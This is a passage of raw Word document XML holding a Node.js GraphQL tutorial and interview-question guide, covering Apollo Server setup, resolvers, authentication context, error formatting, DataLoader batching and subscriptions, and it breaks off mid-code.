      </w:r>
    </w:p>
    <w:p w14:paraId="20271E56"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rPr>
        <w:t>Configure Apollo Server with your schema and resolvers. Create an index.js file to start your server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AF7FD9"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index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C88BA4"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 ApolloServer } = require('apollo-server');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1C3F6"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 typeDefs } = require('./schema');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E75C62"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 resolvers } = require('./resolvers');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCFE5EC" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B46084"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server = new ApolloServer({ typeDefs, resolvers });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE79EFA" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CAB815"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server.listen().then(({ url }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304E09C"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console.log(`Server ready at ${url}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29987E"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0FCBC8C2" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Run Your Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E169AF"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rPr>
        <w:t>Start your server by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9925CF"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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>node index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C4ADE"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rPr>
        <w:t>Your GraphQL server should now be running. You can access the GraphQL Playground (an interactive query editor) at the URL provided in the console output, typically http://localhost:4000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E10A3B" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example GraphQL Queries and Mutations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52523C58"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rPr>
        <w:t>You can use GraphQL Playground or any GraphQL client to test your API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E1DDAD"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A0616"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query {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E183B2E"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hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A32E99"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users {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F8A16"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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1340E"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1456AA32"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email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC00FA"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3C4E553B"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24288D2E"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mutation Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB792E"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mutation {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3154AEC1"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addUser(name: "John Doe", email: "john.doe@example.com") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1022D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D2694"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3DD861"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email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A2C832" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B"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79E70086" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B"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3D644FCD" w14:textId="77777777" w:rsidR="0005308B" w:rsidRPr="00DA2F32" w:rsidRDefault="0005308B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F273F2"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1. What is GraphQL, and how does it differ from REST?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A56E6C8" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>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GraphQL is a query language for APIs that allows clients to request exactly the data they need. Unlike REST, where endpoints return fixed data structures, GraphQL uses a single endpoint and allows clients to specify the shape and structure of the response. This can reduce over-fetching and under-fetching of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E02E4B"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2. How do you set up a basic GraphQL server in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CD075" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>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Setting up a basic GraphQL server in Node.js typically involves using libraries like express-graphql or apollo-server-express. Here’s an example using apollo-server-express:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC28627"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 ApolloServer, gql } = require('apollo-server-express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A17343"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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFBD2A" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3798B658"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Define your schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78982FBF"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typeDefs = gql`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016CB42B"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type Query {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424879D0"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hello: String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175F023"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548A5045"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59365416" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1444B4D9"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Define your resolvers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADAAF0B"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resolvers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279F40B"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Query: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B940291"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hello: () =&gt; 'Hello, world!',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383353D6"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24240672"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151804C1" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557B2293"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Create an instance of ApolloServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEA3FA9"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server = new ApolloServer({ typeDefs, resolvers });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08992392" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F63E2D"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Create an Express app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC2FA6"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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087CAAFB" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B81117"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Apply the GraphQL middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7468C6"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server.applyMiddleware({ app });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E4652E" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560A97DC"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Start the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70C064"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app.listen({ port: 4000 }, () =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5391A4A1"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console.log(`Server ready at http://localhost:4000${server.graphqlPath}`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15658856" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A"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732C0888"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3. What are the main components of a GraphQL schema?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B503992" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>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main components of a GraphQL schema are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBD9318" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="197"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defines the shape of the data. Common types include ObjectType, ScalarType, EnumType, and InterfaceType.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C0DFB4" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="197"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defines the read operations and allows clients to fetch data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2052CA05" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="197"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mutations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defines the write operations for modifying data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231CDC30" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="197"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Subscriptions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows clients to subscribe to real-time updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2537E406"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4. How do you define a resolver in GraphQL, and what is its role?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3371B3" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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resolver is a function that resolves a value for a field in a GraphQL query. It provides the actual data for the field. Resolvers are defined in the resolvers object and are associated with fields in the schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146A8AD5"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resolvers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565CDAC7"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Query: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4341F67C"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hello: () =&gt; 'Hello, world!',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5499C5FE"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2A4D7E09"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Mutation: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E8F429"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createUser: (parent, args) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EBC160"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 Logic to create a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07668314"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02BF4BD8"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7FCD4C12" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A"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01EC4E00"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5. How do you handle authentication and authorization in a GraphQL server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6178F8FD" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>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Authentication and authorization in a GraphQL server can be handled using middleware functions. You can use context in Apollo Server or middleware in Express to manage authentication and enforce access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D46AD"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server = new ApolloServer({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D088E"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typeDefs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE01C9"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resolvers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C75076"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context: ({ req }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E66B3E8"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 Extract token from headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55109A7B"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const token = req.headers.authorization || '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79033A4B"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // Verify token and set user in context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE058BE"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const user = verifyToken(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9307D"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return { user };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385FF7B"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36A6E3E1" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A"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3B81128B"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6. What is the purpose of the context in Apollo Server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1363C" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>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context is a function that provides a way to pass data or functionality (like authentication information) to all resolvers. It’s used to share information between resolvers and to perform tasks like authentication or logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2FBF9A"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context = ({ req }) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD65894"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const token = req.headers.authorization || '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2910F33E"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const user = verifyToken(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A506453"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return { user };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49256C9D" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A"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3BC4A02C"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7. How does GraphQL handle errors, and how can you customize error handling?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141895C" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>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GraphQL errors are typically returned in the errors field of the response. You can customize error handling by using custom error classes and middleware. Apollo Server provides mechanisms to handle errors by defining custom error formats and using error handling hooks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B9146"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server = new ApolloServer({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0920FC7B"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typeDefs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5182AA30"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resolvers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC7D36C"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formatError: (error) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3906A3DC"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 Customize error format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC90FA7"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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A669E"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message: error.message,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EF72EC"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 Other custom fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B18920F"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78A850D7"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6C3250FF" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A"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615A4171"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8. How do you perform batch data fetching in GraphQL?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D812A" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>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Batch data fetching can be done using DataLoader, a library that batches and caches requests to avoid the N+1 query problem. It groups multiple requests into a single request and caches the results to improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F862F0"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DataLoader = require('dataloader');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F85406"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userLoader = new DataLoader(async (keys) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC44EC"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 Fetch data for all keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACDAF0"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return await User.find({ _id: { $in: keys } });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785814C8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66223690" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49942088"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resolvers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B0E2AA"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Query: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F464C1"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user: (parent, args) =&gt; userLoader.load(args.id),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA2784"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0E5ABFE8" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A"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4A80EFA9"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9. What is the N+1 query problem in GraphQL, and how can it be mitigated?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F771211" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>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N+1 query problem occurs when querying related data leads to excessive database queries. For example, fetching a list of users and then fetching their posts individually can result in many queries. This can be mitigated using techniques like DataLoader to batch and cache queries or by using efficient database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCF0B1" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. How do you set up subscriptions in GraphQL, and what are their use cases?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA79F5" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Subscriptions allow clients to subscribe to real-time updates. They are set up using Subscription type in the schema and using libraries like graphql-subscriptions and graphql-ws. They are commonly used for real-time features such as chat applications or live data feeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693301B"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 PubSub } = require('graphql-subscriptions');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A92684"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pubsub = new PubSub();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F378453" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FDC2CFB"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typeDefs = gql`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB6884E"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type Subscription {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197DA20"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messageAdded: Message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997C388"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2E35244E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE8D64" w14:textId="77777777" w:rsidR="004D1D0A" w:rsidRPr="00DA2F32" w:rsidRDefault="004D1D0A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744312FC"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resolvers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C4FB2"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Subscription: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA4D22"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messageAdded: {</w:t>
      </w:r>
    </w:p>
